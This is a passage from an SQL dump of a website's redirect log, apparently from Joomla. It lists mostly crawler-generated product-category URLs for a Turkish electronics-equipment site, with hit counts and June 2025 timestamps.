00:00:00',301),(42654,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_name',NULL,'','',1,0,'2025-06-29 17:28:15','0000-00-00 00:00:00',301),(42655,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:28:17','0000-00-00 00:00:00',301),(42656,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:19','0000-00-00 00:00:00',301),(42657,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:21','0000-00-00 00:00:00',301),(42658,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_sku',NULL,'','',1,0,'2025-06-29 17:28:23','0000-00-00 00:00:00',301),(42659,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:24','0000-00-00 00:00:00',301),(42660,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/dirdesc',NULL,'','',1,0,'2025-06-29 17:28:26','0000-00-00 00:00:00',301),(42661,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:28','0000-00-00 00:00:00',301),(42662,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/mx200lp-detail',NULL,'','',1,0,'2025-06-29 17:28:30','0000-00-00 00:00:00',301),(42663,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/mx200lp-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 17:28:32','0000-00-00 00:00:00',301),(42664,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl???language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:33','0000-00-00 00:00:00',301),(42665,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z',NULL,'','',1,0,'2025-06-29 17:28:35','0000-00-00 00:00:00',301),(42666,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 17:28:37','0000-00-00 00:00:00',301),(42667,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 17:28:39','0000-00-00 00:00:00',301),(42668,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:41','0000-00-00 00:00:00',301),(42669,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:43','0000-00-00 00:00:00',301),(42670,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,category_name',NULL,'','',1,0,'2025-06-29 17:28:45','0000-00-00 00:00:00',301),(42671,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:28:46','0000-00-00 00:00:00',301),(42672,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:48','0000-00-00 00:00:00',301),(42673,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:50','0000-00-00 00:00:00',301),(42674,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,mf_name',NULL,'','',1,0,'2025-06-29 17:28:52','0000-00-00 00:00:00',301),(42675,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:28:54','0000-00-00 00:00:00',301),(42676,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:56','0000-00-00 00:00:00',301),(42677,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:57','0000-00-00 00:00:00',301),(42678,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,ordering',NULL,'','',1,0,'2025-06-29 17:28:59','0000-00-00 00:00:00',301),(42679,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 17:29:01','0000-00-00 00:00:00',301),(42680,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 17:29:03','0000-00-00 00:00:00',301),(42681,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:29:05','0000-00-00 00:00:00',301),(42682,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:29:07','0000-00-00 00:00:00',301),(42683,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:29:08','0000-00-00 00:00:00',301),(42684,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_name',NULL,'','',1,0,'2025-06-29 17:29:10','0000-00-00 00:00:00',301),(42685,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:29:12','0000-00-00 00:00:00',301),(42686,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:29:14','0000-00-00 00:00:00',301),(42687,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:29:16','0000-00-00 00:00:00',301),(42688,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_sku',NULL,'','',1,0,'2025-06-29 17:29:18','0000-00-00 00:00:00',301),(42689,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 17:29:19','0000-00-00 00:00:00',301),(42690,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/cm-602-l-detail',NULL,'','',1,0,'2025-06-29 17:29:21','0000-00-00 00:00:00',301),(42691,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 17:29:23','0000-00-00 00:00:00',301),(42692,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/dirdesc',NULL,'','',1,0,'2025-06-29 17:29:25','0000-00-00 00:00:00',301),(42693,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:29:27','0000-00-00 00:00:00',301),(42694,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/mx200lp-3-detail',NULL,'','',1,0,'2025-06-29 17:29:29','0000-00-00 00:00:00',301),(42695,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 17:29:30','0000-00-00 00:00:00',301),(42696,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/npm-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 17:29:32','0000-00-00 00:00:00',301),(42697,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z?language=en-gb',NULL,'','',1,0,'2025-06-29 17:29:34','0000-00-00 00:00:00',301),(42698,'http://www.3s-technologies.com.tr/en/wood-processing-ah?ap-i??leme',NULL,'','',1,0,'2025-06-29 17:29:40','0000-00-00 00:00:00',301),(42699,'http://www.3s-technologies.com.tr/en/wood-processing-ah?ap-i??leme/mdf-i??leme-mdf-processing',NULL,'','',1,0,'2025-06-29 17:29:41','0000-00-00 00:00:00',301),(42700,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/mx200lp-de',NULL,'','',1,0,'2025-06-29 17:40:24','0000-00-00 00:00:00',301),(42701,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 18:53:46','0000-00-00 00:00:00',301),(42702,'https://3s-technologies.com.tr/tr/file-manager/ckeditor',NULL,'','',15,0,'2025-06-29 20:58:33','0000-00-00 00:00:00',301),(42703,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 21:46:33','0000-00-00 00:00:00',301),(42704,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme?language=en-gb',NULL,'','',1,0,'2025-06-29 21:46:35','0000-00-00 00:00:00',301),(42705,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:46:42','0000-00-00 00:00:00',301),(42706,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 21:46:44','0000-00-00 00:00:00',301),(42707,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:46:50','0000-00-00 00:00:00',301),(42708,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:46:52','0000-00-00 00:00:00',301),(42709,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:46:58','0000-00-00 00:00:00',301),(42710,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:00','0000-00-00 00:00:00',301),(42711,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:04','0000-00-00 00:00:00',301),(42712,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:07','0000-00-00 00:00:00',301),(42713,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:09','0000-00-00 00:00:00',301),(42714,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:13','0000-00-00 00:00:00',301),(42715,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:17','0000-00-00 00:00:00',301),(42716,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 21:47:20','0000-00-00 00:00:00',301),(42717,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 21:47:24','0000-00-00 00:00:00',301),(42718,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:26','0000-00-00 00:00:00',301),(42719,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f?r??n',NULL,'','',1,0,'2025-06-29 21:47:28','0000-00-00 00:00:00',301),(42720,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 21:47:30','0000-00-00 00:00:00',301),(42721,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 21:47:31','0000-00-00 00:00:00',301),(42722,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:33','0000-00-00 00:00:00',301),(42723,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name',NULL,'','',1,0,'2025-06-29 21:47:35','0000-00-00 00:00:00',301),(42724,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 21:47:37','0000-00-00 00:00:00',301),(42725,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:39','0000-00-00 00:00:00',301),(42726,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:41','0000-00-00 00:00:00',301),(42727,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:42','0000-00-00 00:00:00',301),(42728,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/by,ordering',NULL,'','',1,0,'2025-06-29 21:47:44','0000-00-00 00:00:00',301),(42729,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:46','0000-00-00 00:00:00',301),(42730,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name',NULL,'','',1,0,'2025-06-29 21:47:48','0000-00-00 00:00:00',301),(42731,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 21:47:50','0000-00-00 00:00:00',301),(42732,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:52','0000-00-00 00:00:00',301),(42733,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:54','0000-00-00 00:00:00',301),(42734,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_sku',NULL,'','',1,0,'2025-06-29 21:47:56','0000-00-00 00:00:00',301),(42735,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 21:47:57','0000-00-00 00:00:00',301),(42736,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/dirdesc',NULL,'','',1,0,'2025-06-29 21:47:59','0000-00-00 00:00:00',301),(42737,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:01','0000-00-00 00:00:00',301),(42738,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-h?zl???language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:03','0000-00-00 00:00:00',301),(42739,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:10','0000-00-00 00:00:00',301),(42740,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:11','0000-00-00 00:00:00',301),(42741,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:17','0000-00-00 00:00:00',301),(42742,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:18','0000-00-00 00:00:00',301),(42743,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:24','0000-00-00 00:00:00',301),(42744,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:26','0000-00-00 00:00:00',301),(42745,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:29','0000-00-00 00:00:00',301),(42746,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:34','0000-00-00 00:00:00',301),(42747,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:36','0000-00-00 00:00:00',301),(42748,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:39','0000-00-00 00:00:00',301),(42749,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:43','0000-00-00 00:00:00',301),(42750,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:44','0000-00-00 00:00:00',301),(42751,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??',NULL,'','',1,0,'2025-06-29 21:48:46','0000-00-00 00:00:00',301),(42752,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 21:48:48','0000-00-00 00:00:00',301),(42753,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 21:48:49','0000-00-00 00:00:00',301),(42754,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:51','0000-00-00 00:00:00',301),(42755,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:53','0000-00-00 00:00:00',301),(42756,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name',NULL,'','',1,0,'2025-06-29 21:48:55','0000-00-00 00:00:00',301),(42757,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 21:48:56','0000-00-00 00:00:00',301),(42758,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:48:58','0000-00-00 00:00:00',301),(42759,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:00','0000-00-00 00:00:00',301),(42760,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name',NULL,'','',1,0,'2025-06-29 21:49:02','0000-00-00 00:00:00',301),(42761,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 21:49:03','0000-00-00 00:00:00',301),(42762,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:05','0000-00-00 00:00:00',301),(42763,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:07','0000-00-00 00:00:00',301),(42764,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,ordering',NULL,'','',1,0,'2025-06-29 21:49:09','0000-00-00 00:00:00',301),(42765,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:10','0000-00-00 00:00:00',301),(42766,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name',NULL,'','',1,0,'2025-06-29 21:49:12','0000-00-00 00:00:00',301),(42767,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 21:49:14','0000-00-00 00:00:00',301),(42768,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:16','0000-00-00 00:00:00',301),(42769,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:17','0000-00-00 00:00:00',301),(42770,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_sku',NULL,'','',1,0,'2025-06-29 21:49:19','0000-00-00 00:00:00',301),(42771,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:21','0000-00-00 00:00:00',301),(42772,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/dirdesc',NULL,'','',1,0,'2025-06-29 21:49:22','0000-00-00 00:00:00',301),(42773,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:24','0000-00-00 00:00:00',301),(42774,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h?zl???language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:26','0000-00-00 00:00:00',301),(42775,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:33','0000-00-00 00:00:00',301),(42776,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:35','0000-00-00 00:00:00',301),(42777,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:40','0000-00-00 00:00:00',301),(42778,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:42','0000-00-00 00:00:00',301),(42779,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:46','0000-00-00 00:00:00',301),(42780,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:51','0000-00-00 00:00:00',301),(42781,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:53','0000-00-00 00:00:00',301),(42782,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 21:49:55','0000-00-00 00:00:00',301),(42783,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f?r??n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:57','0000-00-00 00:00:00',301),(42784,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f?r??n/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 21:49:58','0000-00-00 00:00:00',301),(42785,'https://3s-technologies.com.tr/index.php/en/products/smd-d?????k-h??zl??/by,product_sku',NULL,'','',1,0,'2025-06-29 21:50:00','0000-00-00 00:00:00',301),(42786,'https://3s-technologies.com.tr/index.php/en/products/smd-d?????k-h??zl??/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 21:50:02','0000-00-00 00:00:00',301),(42787,'https://3s-technologies.com.tr/index.php/en/products/smd-f?r??n/ly-8c-detail',NULL,'','',1,0,'2025-06-29 21:50:03','0000-00-00 00:00:00',301),(42788,'https://3s-technologies.com.tr/index.php/en/products/smd-f?r??n/ly-8c-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 21:50:05','0000-00-00 00:00:00',301),(42789,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 21:50:07','0000-00-00 00:00:00',301),(42790,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 21:50:18','0000-00-00 00:00:00',301),(42791,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-06-29 21:51:09','0000-00-00 00:00:00',301),(42792,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,product_name?language=tr-tr',NULL,'','',1,0,'2025-06-29 21:53:19','0000-00-00 00:00:00',301),(42793,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n/by,product_name',NULL,'','',1,0,'2025-06-29 23:14:47','0000-00-00 00:00:00',301),(42794,'http://3s-technologies.com.tr/en/aluminyum-i??leme-aluminum-processing',NULL,'','',1,0,'2025-06-29 23:15:56','0000-00-00 00:00:00',301),(42795,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d???k-h??zl??/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-06-29 23:22:52','0000-00-00 00:00:00',301),(42796,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-f??n/by,product_name',NULL,'','',1,0,'2025-06-29 23:24:03','0000-00-00 00:00:00',301),(42797,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h??/by,category_name?langua',NULL,'','',1,0,'2025-06-29 23:38:45','0000-00-00 00:00:00',301),(42798,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?lang',NULL,'','',1,0,'2025-06-29 23:40:50','0000-00-00 00:00:00',301),(42799,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme',NULL,'','',1,0,'2025-06-29 23:55:23','0000-00-00 00:00:00',301),(42800,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 23:55:25','0000-00-00 00:00:00',301),(42801,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 23:55:27','0000-00-00 00:00:00',301),(42802,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,category_name',NULL,'','',1,0,'2025-06-29 23:55:29','0000-00-00 00:00:00',301),(42803,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:55:30','0000-00-00 00:00:00',301),(42804,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,mf_name',NULL,'','',1,0,'2025-06-29 23:55:32','0000-00-00 00:00:00',301),(42805,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:55:34','0000-00-00 00:00:00',301),(42806,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,ordering',NULL,'','',1,0,'2025-06-29 23:55:36','0000-00-00 00:00:00',301),(42807,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 23:55:37','0000-00-00 